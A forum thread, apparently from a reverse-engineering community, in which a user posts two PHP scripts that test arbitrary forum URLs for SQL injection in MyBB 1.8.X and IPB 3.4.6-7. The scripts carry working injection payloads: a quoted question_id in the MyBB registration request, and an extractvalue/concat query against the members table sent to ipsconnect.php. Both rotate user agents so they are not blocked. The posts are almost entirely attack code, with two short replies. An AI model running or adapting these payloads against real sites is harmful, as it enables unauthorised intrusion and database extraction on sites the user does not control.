Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
MyBB 1.8.X & IPB 3.4.6-7 SQLi Checker
#1
Mybb:

PHP Code:
<?php
if ( isset( $_GET'q' ] ) )
{
 
 $host $_GET'q' ];
 
 
  
//Making sure http or https is set
 
 if substr$host0) == "http" )
 
 {
 
   $protocol "http";
 
   if substr$host0) == "https" )
 
   {
 
     $protocol "https";
 
   }
    
    
//Removing trailing slashes
 
   if substr$host, -) == '/' )
 
   {
 
     $host substr$host0, -);
 
   }
    
 
   //Initial SQL Injection check
 
   $newHost  $host '/member.php';
 
   $data     "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='";
 
   $response SendPost$newHost$data );
 
   if strpos$response"You have an error in your SQL syntax" ) !== false )
 
   {
 
     printf"%s is vulnerable to MyBB 1.8.X SQL Injection!"$host );
 
   }
 
   else
    
{
 
     printf"%s is not vulnerable to MyBB 1.8.X SQL Injection!"$host );
 
   }
 
 }
 
 else
  
{
 
   echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
 
 }
}
else
{
 
 echo "Invalid parameters, are you drunk?";
}

//Dont get useragent blocked
function getRandomUserAgent()
{
 
 $userAgents = array(
 
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
 
   "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
 
   "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
 
   "Opera/9.20 (Windows NT 6.0; U; en)",
 
   "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
 
   "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
 
   "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
 
   "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" 
 
 );
 
 $random     rand0count$userAgents ) - );
 
 return $userAgents$random ];
}

//Send a post request
function SendPost$site$post )
{
 
 $ch curl_init();
 
 curl_setopt$chCURLOPT_URL"$site);
 
 curl_setopt$chCURLOPT_RETURNTRANSFERtrue );
 
 curl_setopt$chCURLOPT_USERAGENTgetRandomUserAgent() );
 
 curl_setopt$chCURLOPT_POSTFIELDS$post );
 
 $response curl_exec$ch );
 
 curl_close$ch );
 
 return $response;
}
?>

IPB:

PHP Code:
<?php
if (isset($_GET['q'])) {

 
 $host $_GET['q'];
 
 
  
//Ensures you have http or https in your domain name
 
 if (substr($host04) == "http") {
 
   $protocol "http";
 
   if (substr($host05) == "https") {
 
     $protocol "https";
 
   }
 
   
    
//Removes any trailing slashes
 
   if (substr($host, -1) == '/') {
 
     $host substr($host0, -1);
 
   }
 
   
    
//Initial SQL Injection check
 
   $newHost  $host '/interface/ipsconnect/ipsconnect.php';
 
   $sql      'SELECT COUNT(*) FROM members';
 
   $data     "act=login&idType=id&id[]=-1&id[]=-1%29%20and%201%21%3D%22%27%22%20and%20extractvalue%281%2Cconcat%280x3a%2C%28SELE​CT%20COUNT%28%2A%29%20FROM%20members%29%29%29%23%27";
 
   $response SendPost($newHost$data);
 
   
    
//Checking the SQL Error Log for confirmation
 
   $url      $host '/cache/sql_error_latest.cgi';
 
   $response SendGet($url);
 
   if (strpos($response"XPATH syntax error") !== false) {
 
     printf("%s is vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!"$host);
 
   } else {
 
     printf("%s is not vulnerable to IPBoard 3.4.6 or 3.4.7 SQL Injection!"$host);
 
   }
 
   return false;
 
 } else {
 
   echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums";
 
 }
} else {
 
 echo "I think you're lost homie.";
}

//So you cant be blocked via useragent
function getRandomUserAgent()
{
 
 $userAgents = array(
 
   "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
 
   "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
 
   "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
 
   "Opera/9.20 (Windows NT 6.0; U; en)",
 
   "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50",
 
   "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]",
 
   "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9",
 
   "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48"
 
 );
 
 $random     rand(0count($userAgents) - 1);
 
 return $userAgents[$random];
}

//Sends a post request
function SendPost($site$post)
{
 
 $ch curl_init();
 
 curl_setopt($chCURLOPT_URL"$site");
 
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 
 curl_setopt($chCURLOPT_USERAGENTgetRandomUserAgent());
 
 curl_setopt($chCURLOPT_POSTFIELDS$post);
 
 $response curl_exec($ch);
 
 curl_close($ch);
 
 return $response;
}

//Sends a get request, specifically for reading the sql error cgi
function SendGet($site)
{
 
 $ch curl_init();
 
 curl_setopt($chCURLOPT_URL"$site");
 
 curl_setopt($chCURLOPT_USERAGENTgetRandomUserAgent());
 
 curl_setopt($chCURLOPT_HEADER0);
 
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 
 $response curl_exec($ch);
 
 curl_close($ch);
 
 return $response;
}
?>
[Image: YungLean_SadBoys-byFredrikAnderssonAnder...40x300.jpg]
Reply
#2
Why make this in PHP? Interesting none the less.
Reply
#3
(01-20-2015, 11:34 PM)Konloch Wrote:  Why make this in PHP? Interesting none the less.

Because I wanted people who couldn't run the python script to be able to check their shit.
[Image: YungLean_SadBoys-byFredrikAnderssonAnder...40x300.jpg]
Reply
 


Forum Jump:


Users browsing this thread: 1 Guest(s)



About The Bytecode Club

We're a community focused on Reverse Engineering, we try to target Java/Android but we also include other langauges/platforms. We pride ourselves in supporting and free and open sourced applications.

Website